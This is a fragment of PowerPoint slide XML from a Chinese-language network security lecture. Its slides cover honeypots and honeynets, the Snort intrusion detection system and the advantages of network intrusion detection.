          <a:xfrm>
            <a:off x="1474503" y="3813951"/>
            <a:ext cx="6370955" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="10033" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1947"/>
              <a:ext cx="880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发现攻击工具、确定攻击模式、</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="0" latinLnBrk="1" hangingPunct="0"/>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>研究攻击动机</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="47" name="组合 46"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>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9"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pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="图片 50" descr="NetworkVulnerability.gif">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19F6F7FA-E480-6203-47B7-E70EC08368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46459" y="1778605"/>
            <a:ext cx="3089275"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descr="internet-traffic.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect l="3030" t="2370" r="3030" b="24017"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8617585" y="3971942"/>
            <a:ext cx="2962384" cy="2343894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E82D85E-234B-4E82-9286-878F6B75D793}"/>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388368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
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2246629" y="3557514"/>
            <a:ext cx="873989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蜜罐不仅是一种研究工具，还具有真正的商业应用价值</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="3749307" cy="720000"/>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蜜罐</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蜜网技术的优势</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1389284" y="2147241"/>
            <a:ext cx="9597243" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="14368" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1965"/>
              <a:ext cx="1313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大大减少了需要分析的数据</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="组合 18"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>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8"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9" name="组合 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1315089" y="2763156"/>
            <a:ext cx="10413771" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="13335" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>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蜜网计划已收集了大量信息，黑客很少采用新的攻击方法</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="38" name="组合 37"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>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4"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7" name="组合 46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1367725" y="3419669"/>
            <a:ext cx="1134025" cy="957580"/>
            <a:chOff x="3713" y="3122"/>
            <a:chExt cx="1508" cy="1508"/>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9"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nvGrpSpPr>
          <p:cNvPr id="52" name="组合 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB869F95-00D6-6DB3-3C60-FF0252D1378D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1389284" y="4114401"/>
            <a:ext cx="9713845" cy="957580"/>
            <a:chOff x="1066" y="1921"/>
            <a:chExt cx="13336" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4110B6ED-4869-B593-664F-F274DA178F7E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2299" y="2105"/>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虚拟蜜网的出现降低了蜜罐的成本和管理难度</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="55" name="图片 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39168811-0F59-CB8C-E599-46FDDE7A7C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 y="1921"/>
              <a:ext cx="1508" cy="1508"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01BF8EC7-0259-DCB0-7E37-A3CC69889997}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1813509" y="4353843"/>
            <a:ext cx="271145" cy="49149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pic>
        <p:nvPicPr>
          <p:cNvPr id="59" name="图片 58" descr="internet-traffic.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DD89137-B524-B1B1-8540-093478E4BF5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect l="3030" t="2370" r="3030" b="24017"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9116398" y="4366612"/>
            <a:ext cx="2463571" cy="1949224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB7B0A00-313E-4600-B10C-EC3B0F51B4B5}"/>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485497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3566795" cy="720000"/>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实例</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>——SNORT</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="109571" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7509510" y="4546600"/>
            <a:ext cx="3832225" cy="1697990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="76200" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1436370" y="2190750"/>
            <a:ext cx="769366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800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SNORT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是一个强大的轻量级网络入侵检测系统</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="组合 51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1432298" y="2845235"/>
            <a:ext cx="7471410" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="11766" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="1082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具备实时数据流量分析能力，能够进行协议分析和内容搜索</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>匹配</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="55" name="组合 54"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>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4" name="组合 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1432298" y="3350060"/>
            <a:ext cx="3907790" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="6154" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="5209"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具有很好的扩展性和可移植性</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="组合 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>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5" name="组合 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1436108" y="3865680"/>
            <a:ext cx="6848475" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="10785" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="984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遵循通用公共许可证GPL，任何组织和个人都可以自由使用</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="27" name="组合 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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2" name="组合 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1433568" y="4392095"/>
            <a:ext cx="3906520" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="6152" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 2"/>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入侵检测规则是完全开放的</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34" name="组合 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2187575" y="5473700"/>
            <a:ext cx="3997960" cy="3956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400" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://www.snort.org</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D9BAD0B-4E33-4969-B0C1-E4428AD8A785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3.1 NIDS</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1550110" y="1300637"/>
            <a:ext cx="1600331" cy="942555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="组合 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1550035" y="2323465"/>
            <a:ext cx="4132580" cy="3825875"/>
            <a:chOff x="1906" y="3714"/>
            <a:chExt cx="6508" cy="6025"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="51" name="组合 50"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4295" y="3976"/>
              <a:ext cx="1761" cy="897"/>
              <a:chOff x="3792538" y="3152454"/>
              <a:chExt cx="1239837" cy="734063"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="52"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5" name="Text Box 24"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3860799" y="3293024"/>
                <a:ext cx="1109128" cy="59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sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="矩形: 剪去左右顶角 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1906" y="3714"/>
              <a:ext cx="6508" cy="6025"/>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8" name="组合 17"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1906" y="5108"/>
              <a:ext cx="5608" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="5608" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2049" y="8378"/>
                <a:ext cx="4663" cy="648"/>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dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="002060"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>可提供实时的网络行为检测</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="20" name="组合 19"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>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3" name="组合 22"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1908" y="5794"/>
              <a:ext cx="6016" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="6016" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="24"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可保护多态网络主机</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="25" name="组合 24"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>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8" name="组合 27"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1908" y="6413"/>
              <a:ext cx="6016" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="6016" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2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具有良好的隐蔽性</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="30" name="组合 29"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>
              </a:xfrm>
            </p:grpSpPr>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3" name="组合 32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1908" y="7084"/>
              <a:ext cx="6016" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="6016" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
